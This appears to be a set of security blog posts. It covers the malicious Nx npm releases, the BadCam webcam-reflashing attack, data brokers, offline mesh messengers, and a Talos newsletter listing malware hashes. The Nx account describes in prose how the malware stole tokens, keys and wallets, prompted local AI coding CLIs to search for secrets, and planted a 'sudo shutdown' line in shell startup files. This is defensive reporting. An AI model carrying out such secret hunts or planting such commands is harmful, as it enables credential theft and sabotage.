Packages of the popular build platform and CI/CD optimization system, Nx, were compromised on the night of August 26-27. A malicious script was added to the system’s packages, which, according to npm repository statistics, have more than five million weekly downloads. Thousands of developers that use Nx to accelerate and optimize application development had their sensitive data stolen: npm and GitHub tokens, SSH keys, cryptocurrency wallets, and API keys were uploaded to the public GitHub repositories. The massive leak of secrets poses a long-term threat of supply chain attacks: even when malicious packages are removed from affected systems, attackers may still have the ability to compromise applications created by these thousands of developers.

Attack and response chronology

The attackers used a compromised token issued for one of the Nx package maintainers to publish multiple malicious versions of the Nx package and its plugins in the two hours between 22:32 UTC, August 26 and 0:37 UTC, August 27. Another two hours later, the npm platform removed all compromised versions of the packages, and another hour later, the Nx owners revoked the stolen token — so attackers lost access to the Nx repository. Meanwhile, thousands of public repositories containing data stolen by the malicious script began appearing on GitHub.

At 9:05 UTC on August 27, GitHub responded by making all leaked repositories private and unsearchable. Nevertheless, the stolen data was publicly available for more than nine hours, and was downloaded multiple times by groups of cybercriminals and researchers. A total of 19 compromised versions of Nx and plugins were released:

• @nx, 20.9.0, 20.10.0, 20.11.0, 20.12.0, 21.5.0, 21.6.0, 21.7.0, 21.8.0
• @nx/devkit, 20.9.0, 21.5.0
• @nx/enterprise-cloud, 3.2.0
• @nx/eslint, 21.5.0
• @nx/js, 20.9.0, 21.5.0
• @nx/key, 3.2.0
• @nx/node, 20.9.0, 21.5.0
• @nx/workspace, 20.9.0, 21.5.0.

How this attack was possible

For a short time starting from August 21, the Nx code used a vulnerable workflow (GitHub action workflow) that allowed arbitrary code injection. Attackers took advantage of this to modify publish.yml on August 24 and extract an npm token that grants rights to publish packages. Although the vulnerability was patched, the token leak was not noticed until it was exploited in an attack on August 26.

Malware features and targets

The Nx packets were trojanized using a malicious post-installation script called telemetry.js. It targets development environments on macOS and *nix (when run on Windows, the malicious script immediately terminates).

Once run, the script searches the affected system for the following types of data:

• MetaMask, Electru, Ledger, Trezor, Exodus, Phantom, Solflare key storages and crypto wallets
• Random key storage files (*key, *keystore.json, UTC–, IndexedDB)
• GitHub personal authentication tokens
• Access tokens for npm
• .env files
• RSA private keys (id_rsa).

It’s noteworthy that popular LLMs running via command line tools were used for the searches. If Anthropic Claude, Amazon Q or Google Gemini CLI tools were installed on the system, script made an insecure query that required finding all the listed data types.

All found data was uploaded to GitHub in obfuscated form — encoded in base64 multiple times. To do this, the malware used stolen GitHub tokens, created a publicly accessible s1ngularity-repository, s1ngularity-repository-0, or s1ngularity-repository-1 on behalf of the victim, and uploaded a single results.b64 file there.

The attackers probably aim to quickly exploit the stolen data; after all, the malicious script hasn’t tried to be stealthy, but instead tried to aggressively isolate the victim from accessing working systems. To do this, it added the sudo shutdown command to~ /.bashrc and ~/.zshrc, resulting in new terminal sessions immediately initiating a system shutdown.

How to test your systems

Organizations using Nx should check their package versions, and audit their GitHub accounts and logs.

1. Check the Nx package versions in use with the npm ls nx command
2. Check for any Nx packages in package-lock.json
3. Check for security events in the GitHub logs.

If repositories named s1ngularity-repository* are found, download the results.b64 files from them for further investigation, and remove them from GitHub.

When malicious repositories are detected:

1. Remove node_modules completely: rm -rf node_modules
2. Clean the npm cache: npm cache clean –force
3. Check and clean out extraneous commands from ~/.bashrc and ~/.zshrc
4. Make an archive copy for investigation and delete the /tmp/inventory.txt and /tmp/inventory.txt.bak files from the system
5. Remove malicious package versions from package-lock.json
6. Reinstall the safe versions of the packages.

The most critical and urgent action for compromised systems is to update all secrets that the malware may have accessed by the malware (GitHub PATs, npm tokens, SSH keys, API keys in .env files and Claude, Gemini and Q keys).

You should also continue to monitor your GitHub repositories. First, even after all these steps, there may still be Trojanized versions of Nx on compromised systems that will continue to download stolen information. Second, if attackers have already managed to use the stolen tokens before they rotate them, this will most likely manifest itself in unauthorized commits or malicious changes to GitHub actions.

Kaspersky official blog – ​Read More

Computer webcams have long been suspected of peeping on folks; nothing unusual about that. But now they’ve found a new role in conventional cyberattacks. At the recent BlackHat conference in Las Vegas, researchers presented the BadCam attack, which allows an attacker to reflash a webcam and execute malicious actions on the computer it’s connected to. Essentially, it’s a variation of the well-known BadUSB attack; the key difference is that with BadCam attackers don’t need to prepare a malicious device in advance — they can use a “clean” webcam already connected to the computer. Another unwelcome novelty is that the attack can be carried out completely remotely. Although the research was conducted by ethical hackers, and BadCam hasn’t yet been observed in real-world attacks, it won’t be difficult for criminals to figure it out and reproduce the necessary steps. That’s why organizations should understand how BadCam works and implement protective measures.

The return of BadUSB

It was also at BlackHat that BadUSB was unveiled to the world — back in 2014. It works by taking a seemingly harmless device (say, a USB stick) and reprogramming its firmware. When it connects to a computer, the malicious gadget presents itself as a composite USB device with multiple components, such as a flash drive, keyboard, or network adapter. Its storage functions work normally, so the user interacts with the flash drive as usual. Meanwhile, a hidden firmware component impersonating a keyboard sends commands to the computer — for example, a key combination to launch PowerShell and enter commands to download malware from the internet, or to open a tunnel to the attackers’ server. BadUSB techniques are still widely used in red team exercises — often implemented via specialized hacker multitools like Hak5 Rubber Ducky or Flipper Zero.

From BadUSB to BadCam

Researchers at Eclypsium managed to replicate this firmware-rewriting trick on Lenovo 510 FHD and Lenovo Performance FHD webcams. Both use a SigmaStar SoC, which has two interesting features. First, the webcam software is Linux-based and supports USB Gadget extensions. This Linux kernel feature allows the device to present itself as a USB peripheral such as a keyboard or network adapter. Second, the webcam’s firmware update process lacks cryptographic protection — it’s enough to send a couple of commands and a new memory image over the USB interface. Reflashing can be carried out by running software on the computer with standard user privileges. With this altered firmware, Lenovo webcams turn into a keyboard-camera hybrid capable of sending predefined commands to the computer.

Although the researchers tested only Lenovo webcams, they note that other Linux-based USB devices may be similarly vulnerable.

Cyber-risks of the BadCam attack

Potential attack vectors for BadCam against an organization include:

• A new camera sent by the attacker
• A camera temporarily disconnected from a corporate computer and connected to the attacker’s laptop for reflashing
• A camera that was never disconnected from the organization’s computer, and compromised remotely via malware

Detecting this malware through behavior analysis can be tricky, since it doesn’t need to make suspicious changes to the registry, files, or network — it only has to communicate with the webcam. If the first phase of the attack succeeds, the malicious firmware can then send keyboard commands to:

• disable security tools;
• download and execute additional malware;
• launch legitimate tools for a Living Off the Land (LotL) attack;
• respond to system prompts, for example for elevating privileges;
• exfiltrate data from the computer over the network.

At the same time, standard software scans won’t detect the threat, and even a full system reinstall won’t remove the implant. System logs will show that the malicious actions were performed from the logged-in user’s keyboard. For this reason, such attacks will most likely be deployed for persistence in the compromised system — although in the MITRE ATT&CK matrix, BadUSB techniques are listed under T1200 (Hardware Additions) and assigned to the Initial Access phase.

How to defend against BadCam attacks

The attack can be stopped at several stages using standard security tools that block trojanized peripherals and make LotL attacks more difficult. We recommend that you:

• Configure your EDR/EPP solution to monitor connected HID devices. In Kaspersky Next, this feature is called BadUSB Attack Prevention. When a device with keyboard functionality is connected, the user must enter a numeric code displayed on the screen, without which the new keyboard can’t control the system.
• Configure your SIEM and XDR solutions to collect and analyze detailed telemetry for HID device connections and disconnections.
• Set up USB port control in your MDM/EMM solution. Depending on its capabilities, you can disable USB ports altogether or create an allowlist of devices (by VID/PID identifiers) permitted to connect to the computer.
• Where possible, enforce an application allowlist on employee computers so that only approved software can run and all other applications are blocked.
• Regularly update not only the software but also the firmware of standard equipment. For example, Lenovo has released patches for the two camera models used in the research, making malicious firmware updates more difficult.
• Apply the Principle of Least Privilege, ensuring each employee has only the access rights strictly necessary for their role.
• Include BadUSB and BadCam in employee security-awareness training, with simple guidance on what to do if a USB device behaves unexpectedly — for example, if it starts typing commands on its own.

Kaspersky official blog – ​Read More

Data brokers compile extensive dossiers on you to resell later. They’re interested in all of us — hundreds of millions of folks worldwide — and they don’t ask for our permission or pay us any compensation. Most of these companies aren’t well known, and you’ve likely never had any direct contact with them. But there are around a thousand of them in the U.S. alone, and five times as many worldwide. This market was estimated at nearly $300 billion last year. Data brokers’ clients include banks checking credit history, retailers looking for new customers, intelligence agencies, and many other organizations that need detailed data on individuals.

What do data brokers collect, and where from?

Data brokers collect anything and everything they can get their hands on. Most often:

• Personal information: full names, physical addresses, dates of birth, phone numbers, email addresses, identification numbers (passports, driver’s licenses, social security numbers, etc.)
• Age, gender, origin, marital and financial status, level and type of education
• Number and type of pets
• Car make and mileage
• Geolocation data: likely places of work and residence, favorite stores, entertainment spots
• Details on online and offline purchases, membership in retailer loyalty programs, favorite brands
• Detailed financial information: creditworthiness, number and types of accounts, deposits, investments, mortgages, credit card habits, bankruptcy data
• Online behavior data: favorite websites, types of content frequently viewed on social media, hobbies, recently viewed ads, etc.

• Health information, including data on medication purchases, online symptom searches, data from fitness apps
• Habits, interests, political and religious beliefs, favorite media outlets
• Social connections: family members, coworkers, friends

To compile such an intimidatingly detailed file, brokers download any publicly available data (social media profiles, business registries, real estate registries, online classified ads), request information from credit bureaus, and buy data from each other. They also purchase data from loyalty programs, and analytics from gadget vendors. And they collaborate with online advertising and tracking firms — especially those that place ads in mobile apps.

All this information is cross-referenced using recurring identifiers (email addresses, phone numbers, names and addresses, ID numbers) to enrich each profile.

What’s so bad about data collection?

Collected and resold data has an invisible yet significant impact on your life. Why were you denied a loan, or why did your insurance premium go up? How come real estate agents have your phone number when you only decided to buy a house yesterday? According to a U.S. Senate committee investigation, some data brokers’ collections are clearly designed to exploit people’s difficult circumstances. The names of these datasets speak for themselves: “Rural and Barely Making It”, “Retiring on Empty: Singles”, and “Tough Start: Young Single Parents”. Information like this is often purchased by payday loan providers. Other collections are ominously named too, such as “Individuals who recently visited abortion clinics”.

In an extreme example from 2025, a killer bought data on victims’ residential addresses from publicly available data broker websites to track and assassinate political targets in the U.S.

The same Senate investigation highlights that brokers usually operate in secrecy. They collect data without directly interacting with consumers, often hide their data sources, and prohibit their buyers from revealing where contact lists were obtained.

Note that data brokers, like any other companies, are vulnerable to cyberattacks. When they’re breached, the data they’ve collected falls into the hands of true cybercriminals. The scale of the consequences for victims of a data breach can be illustrated with just one case: last year, hackers stole a database containing 2.7 billion records from a company named National Public Data. The records included full names, addresses, dates of birth, phone numbers, and social security numbers (SSNs). It’s believed that the breach affected every US citizen or resident with an SSN!

The challenges of getting your data removed

While the world is gradually introducing legislation to force data brokers to comply with user requests to find and remove personal information, the process can be quite challenging in practice.

• There’s no centralization. You have to search for your own data on each data broker’s website and make separate removal requests.
• Even locating data brokers — not to mention the page on their website where you can make a request — can be fraught with difficulty. According to a recent study by The Markup, in California alone — where local legislation mandates centralized registration of data brokers and requires data removal upon a user request under the CCPA — 35 out of 499 registered data brokers prohibited search engines from indexing and displaying their data removal pages. The removal link itself is often buried deep in the website’s footer or elsewhere (in one case it was found on page 15 of the privacy policy).
• Information removal requests are often complex and consist of multiple steps. They may even require more personal data from you to prove that you are indeed you, and you have the right to submit a request. A study by UC Irvine highlighted some exotic methods of identity verification, such as providing your zodiac sign or your monthly car loan payment amount. If the request isn’t worded correctly or the verification data isn’t provided, the request is ignored.
• The same study found that, out of 454 information removal requests submitted, 195 (43%) were ignored.

How to actually remove yourself from data brokers’ databases

If you’re up for a challenge, arm yourself with both patience and a spreadsheet (in Excel or similar), and follow our instructions:

• First, identify the data brokers you want to contact. You can find a full up-to-date list from the Privacy Rights Clearinghouse, but it’s heavily focused on U.S.-based companies. While they’re the biggest players in the market, be sure to find brokers specific to your region as well.
• Create and save a standard template for your removal request email. The message should include your key personal details and reference the applicable laws in your case: CCPA for California residents; GDPR for the EU; UK-GDPR for the UK; LGPD for Brazil; 152-FZ for Russia. Even if you don’t live in one of these regions, you can still reference CCPA or GDPR — some providers will honor the request without verifying if the law directly applies to you.
• For each data broker, locate the page for submitting a request, which might be named “Opt Out”, “Do Not Sell”, “Privacy Request”, “Right to Delete”, “Right to Be Forgotten”, or something along those lines. Your best bet is to start by looking for small-print links in the footer of the web page. If you can’t find anything there, check the privacy policy section. You can also try a Google search.
• Carefully review the broker’s specific requirements. If they require you to send a request via email, simply send your template to the provided address. If an online form is required, fill in the fields using snippets from the same template.
• In your spreadsheet, indicate the name of the broker, the date you submitted the request, and the URL of the request page (so you don’t have to search for it again).
• Be patient — a response (if you get one at all) could take up to six weeks. This is where your spreadsheet comes in handy — you can use it to track response times and send follow-up requests as needed.
• For those who lack the time or patience, there are paid services that can automatically send these requests for you.
• Most importantly, this isn’t a one-time process. Data about you is constantly being collected and sold to brokers, so you should go through the same list again every three to six months.

How to stay off data brokers’ lists in the first place

It’s near impossible to avoid getting noticed by data brokers altogether, but you can minimize the amount of data they collect.

• Use multiple email addresses and phone numbers. One for communicating with friends, family, banks, and government agencies. A different one for online stores and non-essential services. You can even use more than two email addresses.
• Provide minimal information to loyalty programs.
• Go through the settings in your online banking apps and on your favorite e-commerce sites. Make sure you’ve turned off all permissions in sections like “Marketing Data”, “Advertising Preferences”, and “Partner Offers”. Feeding data to brokers is often disguised under phrases like “Show me ads based on my interests”.
• Turn off and reset advertising IDs on your smartphone.
• Disable location tracking for most of your apps.
• Use the privacy settings in social networks and messaging apps.
• Use a private browser or an app that protects against online tracking. Special privacy features are available in Kaspersky Premium.
• Take advantage of our free Privacy Checker service to adjust your privacy settings everywhere — from social networks to operating systems.
• Subscribe to our read our Telegram channel to be the first to learn about new threats to your privacy and how to combat them. For example, we’ll soon be publishing detailed instructions on how to minimize and clean up your digital footprint (for both adults and minors).

Other posts about how your personal data is collected and how to fight back:

• How to shrink your digital footprint
• Digital detox: How to take a safe break from screens
• Geolocation data brokers: What they do and what happens when they leak
• How to stop being tracked via Bluetooth beacons like AirTag
• Advertisers sharing data about you with… intelligence agencies
• And others

Kaspersky official blog – ​Read More

Constant access to the internet and a cell service is taken as much for granted these days as electricity, and it’s sometimes hard to imagine how we ever lived without them before. But what if you find yourself in a situation with no mobile internet or cell signal, but you need to stay in touch with friends nearby? For example, your group gets separated on a plane and you’re seated in different sections, but you were all set to discuss your travel plans during the flight. Or you’re at a music festival where the internet is wobbly and it’s too loud to talk, but you still need to coordinate when to head to the main stage.

This is where decentralized p2p (peer-to-peer), or mesh messaging apps can come in handy. These apps allow you to connect multiple devices into a single “mesh” network via Bluetooth or Wi-Fi Direct.

In the 2010s, with the emergence of Wi-Fi Direct, apps like these made a lot of noise, but never really took off — it wasn’t clear what they were for or where you’d even use them. They were an odd substitute for walkie-talkies, but with a shorter range and higher power consumption, so they never became popular with smartphone users. Still, these types of messaging apps are alive and well today, with developers continuing to support them, and even building new ones.

That’s because they serve a key purpose: allowing folks to stay connected during natural disasters, coordinate search party efforts, or simply communicate with neighbors at home or at the summer cottage when there’s no Wi-Fi or cell signal. For these and other similar situations, decentralized messaging apps that don’t require an internet connection are a good, if not perfect, solution.

So, if those walkie-talkies you ordered don’t arrive before your planned hike, mesh messaging apps can step in as a backup.

The term “decentralized” is also often used to describe blockchain messaging apps like Status or Brave Messenger. However, we won’t be talking about them today since they require a stable internet connection to work.

How p2p messaging apps work

These apps work on a decentralized mesh network, where each device serves as both a client and a relay. A distributed network is built up from many client devices, and each member can act as a bridge to pass messages along.

Imagine your smartphone turning into a mini walkie-talkie that can send messages to other nearby devices that have the right app installed. If you want to send a message, it’ll hop from one user’s smartphone to another’s until it reaches the intended recipient. And the devices it passes through can’t read the message as it’s encrypted for connecting nodes.

Devices connect directly with each other via either Bluetooth or Wi-Fi Direct.

Which mesh messaging apps are worth trying?

BitChat. This is the latest decentralized messaging app based on Bluetooth Low Energy (BLE), launched in July 2025 by ex-Twitter (now X) co-founder Jack Dorsey. The app is positioned as a modern, encrypted version of the IRC chats from the late 1990s — and it looks like one too.

It claims to be completely decentralized with no servers and to use end-to-end encryption; messages are broken into 500-byte fragments for smoother transmission. The app requires no sign-up, email, or phone number.

However, security researchers have already found critical vulnerabilities in BitChat, and even call it a victim of “vibe coding” — an AI-driven development technique that omits a proper security audit. Currently, AI-powered tools still struggle with “secure by design”, meaning they have difficulty integrating fundamental security principles at the app’s design phase. Jack Dorsey promises to fix the bugs in upcoming updates.

You can install the messenger from both the App Store and Google Play. The source code is available on GitHub, and you can follow the official releases and updates on Jack Dorsey’s X account.

Bridgefy. This has over 12 million users, which is a lot for a mesh messaging app — the more users there are, the more likely you’ll be able to connect.

Bridgefy also uses BLE, works on both iOS and Android, supports end-to-end encryption, and has two modes: private messaging and public broadcasting. On the downside, the free version is plagued with obtrusive ads, and performance can be patchy.

Briar. This is an open-source, end-to-end encrypted messaging app whose code has passed an independent security audit by Germany’s Cure53.

In addition to working via Bluetooth and Wi-Fi Direct, it can also connect over the internet through the Tor network, which makes it a more versatile tool.

While Briar provides the highest level of privacy and security, there are trade-offs. First, you can only add a contact in person by scanning a QR code or by using special links shared through other channels. Second, forget about voice messages, files, or GIFs — Briar only supports text messaging.

Finally, Briar is only available for Android.

White Mouse. A relatively new project, White Mouse is a chat app with disappearing messages. It’s currently only available for Android, but the developers have promised versions for iOS, macOS, and Windows. It doesn’t require a phone number to sign up, provides end-to-end encryption, doesn’t store messages anywhere, and can automatically delete them. To increase privacy, White Mouse doesn’t allow users to forward messages, take screenshots, or record the screen. It also creates special backgrounds with watermarks to prevent chats from being photographed. It can work both over the internet and directly between nearby devices.

What to bear in mind when using mesh messaging apps

• They aren’t a replacement for centralized messaging apps. Even in an urban environment, sending a message to a friend in the next building over can be a challenge.
• The range is limited by Bluetooth/Wi-Fi power. At least one other user with the same messaging app must be within 100 meters of you in an open area — even closer if there’s no direct line of sight.
• Performance depends on the number of users — the more people using the app, the further a message can travel. A mesh network with enough users can stretch for miles. This means you may have to play the diplomat and convince all your friends to switch from their more user-friendly chat apps.
• Your battery will drain faster with active Bluetooth / Wi-Fi Direct use, so stock up on power banks.
• Not all mesh messaging apps use reliable encryption. Claiming to have it and actually having it aren’t the same thing, so only trust independent researchers and their verification.
• Favor open-source projects, as these allow a wide range of researchers to verify app security.
• Some apps may have vulnerabilities, as the example with BitChat showed. Therefore, it’s not recommended to discuss anything confidential in these apps. And use Kaspersky Premium on your devices to prevent your data from being compromised and to defend against malicious actors.

General tips for using mesh messaging apps

Mesh messaging apps aren’t a replacement for regular messaging apps for daily communication. They’re a tool for special circumstances and should be treated like a first-aid kit, a fire extinguisher, or a life jacket — have one on hand and be glad you normally don’t have to use it.

• Install and set up the app in advance — at the critical moment, you may not have time to figure things out or be able to install the app.
• Make sure your contacts, neighbors, or travel buddies have the same app installed.
• Install several different mesh messaging apps if your lifestyle involves frequent travel or being in places with potential connectivity issues — you never know which one will find a “partner” nearby.
• Before an important event, test the app under conditions similar to what you expect to encounter.
• Have a backup communication plan, such as actual walkie-talkies suited for the specific terrain.

What else to read about messaging app security?

• What makes a messaging app secure?
• Messengers 101: safety and privacy advice
• How to host private videoconferences
• WhatsApp and Telegram account hijacking: How to protect yourself against scams
• Messaging other platforms via WhatsApp: the pros and cons

Kaspersky official blog – ​Read More

(Welcome to this week’s edition of the Threat Source newsletter.) 

Diane, 

2:01 p.m., August 21st. I’ve just returned from a remarkable journey through Seattle and the misty roads of the Olympic Peninsula. If you ever find yourself driving beneath those towering Douglas firs or dragged by your partner through the Twilight Museum in Forks, I recommend stopping for a cup of hot, black coffee and a slice of cherry pie at any roadside diner. It’s nothing short of extraordinary.  

But as I navigated the Rialto Beach tidepools (at 5:30 a.m., no less) and moss-laden trees of the Hoh Rainforest, I made a classic misstep: I forgot to connect to Wi-Fi the entire trip. By the time I returned, my high-speed data allowance had vanished into the mist, leaving me puzzled and restarting my cell phone for days — a humbling reminder that even seasoned agents can overlook the basics. 

Travel is a curious thing, Diane. When you’re on the road, it’s easy to let your guard down, become enchanted by the scenery and forget that digital dangers can lurk behind every public WiFi signal or seemingly harmless USB charging station. 

As the summer draws to a close and more people venture out of Twin Peaks for those last-minute adventures, I’ve compiled a list of field-tested precautions for the journey ahead, because even professionals need a reminder sometimes: 

1. Update your devices and back up important data before you leave. If a device is lost, stolen or infected with malware, you’ll still have access to your files. 
2. Turn off auto-connect features to reduce the risk of connecting to rogue networks or devices. 
3. Only take what you need. The fewer devices you take, the fewer you have to keep track of and worry about. 
4. Limit the use of location services on your devices and apps unless necessary. This protects your privacy and reduces the risk of targeted attacks while traveling. 
5. Steer clear of public computers in hotel lobbies and libraries, especially for accessing sensitive accounts. If you must use them — or if you log in to any streaming services during your stay —  don’t forget to log out of your accounts. 
6. Public WiFi is convenient, but we know its security can be questionable. Use a VPN or your phone’s hotspot for a more secure connection. 
7. Set up device tracking (like Find My iPhone or Find My Device) and know how to remotely wipe your device in case it’s lost or stolen. 
8. Take a power bank with you to avoid using USB charging stations, which could result in malware being downloaded to your device. 

Diane, the woods are lovely, dark and deep, and so are the digital trails we leave behind. Stay vigilant, stay caffeinated and remember that the best protection is awareness. 

Special Agent Dale Cooper

The one big thing 

Static Tundra, a Russian state-backed group, is exploiting end-of-life and unpatched Cisco network devices using a seven-year-old patched vulnerability (CVE-2018-0171) to steal data and maintain long-term hidden access in organizations worldwide. Their tactics include persistent implants and bespoke SNMP tools to exfiltrate data and maintain undetected access, with a focus on entities of strategic interest to the Russian government. We urge immediate patching or disabling of at-risk features to prevent compromise. 

Why do I care? 

If your organization uses Cisco devices that haven’t been patched or replaced, you could be vulnerable to undetected cyberattacks and data breaches—even if the vulnerability is years old. This risk affects organizations of all sizes and industries, putting sensitive data and business operations in jeopardy. 

So now what? 

Immediately review your network infrastructure for unpatched or end-of-life Cisco devices and apply available patches or disable vulnerable features as recommended. Ongoing security hardening, regular updates and vigilant monitoring are critical to defend against this and similar state-sponsored threats.

Top security headlines of the week 

Workday Data Breach Bears Signs of Widespread Salesforce Hack 
Workday said threat actors gained access to a third-party customer relationship management (CRM) system and obtained “commonly available business contact information” such as names, phone numbers, and email addresses. (SecurityWeek) 

Novel 5G Attack Bypasses Need for Malicious Base Station 
A team of researchers from the Singapore University of Technology and Design released a framework named Sni5Gect that can be used to sniff messages and perform message injection in 5G communications. (SecurityWeek) 

Internet-wide Vulnerability Enables Giant DDoS Attacks 
Researchers from Tel Aviv University have identified a way around the Rapid Reset fix called “MadeYouReset,” and it’s raising the possibility that attackers could enact cyberattacks against up to one-third of all websites globally. (Dark Reading) 

Threat Actors Allegedly Listed Windows Zero-Day RCE Exploit For Sale on Dark Web 
The threat actor claims it targets fully updated Windows 10, Windows 11, and Windows Server 2022 systems. The sale conditions emphasize exclusivity, prohibiting resale unless explicitly negotiated, which is typical for premium exploits. (Cybersecurity News) 

XenoRAT malware campaign hits multiple embassies in South Korea  
The targets were generally European embassies in Seoul and the themes included fake meeting invites, official letters, and event invitations, often sent from impersonated diplomats. (BleepingComputer)

Can’t get enough Talos? 

The art of controlling information 
JJ Cummings leads Talos’ Threat Intelligence and Interdiction team on nation-state security and intelligence. He shares his story, thoughts on burnout and motivation, and advice for anyone looking to join Talos.

Ransomware incidents in Japan during the first half of 2025 
In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year. Read our blog to learn the most recent trends.

Cyber Analyst Series: Cybersecurity overview and the role of the cybersecurity analyst 
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).

Upcoming events where you can find Talos 

• BlueTeamCon (Sept. 4 – 7) Chicago, IL 
• LABScon (Sept. 17 – 20) Scottsdale, AZ 
• VB2025 (Sept. 24 – 26) Berlin, Germany 

Most prevalent malware files from Talos telemetry over the past week

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
MD5: 71fea034b422e4a17ebb06022532fdde    
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details
Typical Filename: VID001.exe    
Claimed Product: N/A    
Detection Name: Coinminer:MBT.26mw.in14.Talos  

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610  
MD5: 85bbddc502f7b10871621fd460243fbc   
VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details  
Typical Filename: N/A  
Claimed Product: Self-extracting archive  
Detection Name: Win.Worm.Bitmin-9847045-0 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
MD5: 7bdbd180c081fa63ca94f9c22c457376  
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details  
Typical Filename: IMG001.exe  
Detection Name: Simple_Custom_Detection    

SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
MD5: df11b3105df8d7c70e7b501e210e3cc3  
VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details  
Typical Filename: DOC001.exe  
Claimed Product: N/A  
Detection Name: Win.Worm.Coinminer::1201 

Cisco Talos Blog – ​Read More